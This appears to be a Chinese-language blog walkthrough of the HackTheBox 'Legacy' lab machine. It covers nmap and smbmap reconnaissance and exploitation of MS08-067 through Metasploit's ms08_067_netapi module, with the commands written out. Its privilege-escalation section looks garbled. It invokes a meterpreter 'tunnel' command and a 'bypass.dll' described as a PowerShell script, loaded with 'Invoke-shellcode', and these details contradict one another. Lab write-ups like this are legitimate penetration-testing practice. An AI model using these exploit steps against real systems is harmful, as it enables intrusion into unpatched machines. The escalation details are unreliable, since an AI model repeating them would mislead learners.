返回
探索 HTB Legacy 靶机:从侦察到权限提升
闲谈
2024-02-02 05:46:30
技术指南:HTB Legacy 靶机的进阶渗透指南
简介
HackTheBox (HTB) Legacy 靶机是一个 Windows 系统,旨在挑战渗透测试人员的技能。该靶机包含多个漏洞,可以通过精心的探索和利用来获得 SYSTEM 权限。本指南将详细介绍渗透过程,重点介绍 nmap 扫描、SMB 映射、漏洞利用和权限提升技术。
侦察
- nmap 扫描: 使用 nmap 对靶机进行常规扫描,以识别开放端口和服务。
nmap -sV -p- <靶机 IP 地址>
漏洞发现
- SMB 映射: 使用 smbmap 工具查看靶机共享了什么文件。
smbmap -H <靶机 IP 地址>
结果可能显示拒绝访问错误,表明存在 SMB 漏洞。
- MS08-067 漏洞: 这是一种 SMB 漏洞,允许攻击者在未经身份验证的情况下执行任意代码。在 HTB Legacy 靶机上,此漏洞导致了远程代码执行。
漏洞利用
- Metasploit: 使用 Metasploit 利用 MS08-067 漏洞。
use exploit/windows/smb/ms08_067_netapi
set RHOSTS <靶机 IP 地址>
exploit
权限提升
- meterpreter 会话: 漏洞利用成功后,您将获得一个 meterpreter 会话。
- 建立隧道: 使用 meterpreter 内置的 tunnel 命令,将远程系统上的端口映射到您的本地系统。
tunnel local <本地端口> remote <远程端口>
- 连接 PowerShell: 使用 tunnel 创建的本地端口连接到靶机的 PowerShell 实例。
powershell -NoProfile -NonInteractive -Command "Import-Module bypass.dll; Invoke-shellcode"
- bypass.dll: 这是一个 PowerShell 脚本,用于绕过受限的 PowerShell 实例。
- SYSTEM 权限: 执行 bypass.dll 后,您将获得 SYSTEM 权限。
结论
通过遵循本指南中的步骤,您可以成功渗透 HTB Legacy 靶机,利用 MS08-067 SMB 漏洞并获得 SYSTEM 权限。本指南涵盖了侦察、漏洞发现、漏洞利用和权限提升的关键步骤,对于渗透测试人员提高其对 Windows 系统安全性的理解和技能至关重要。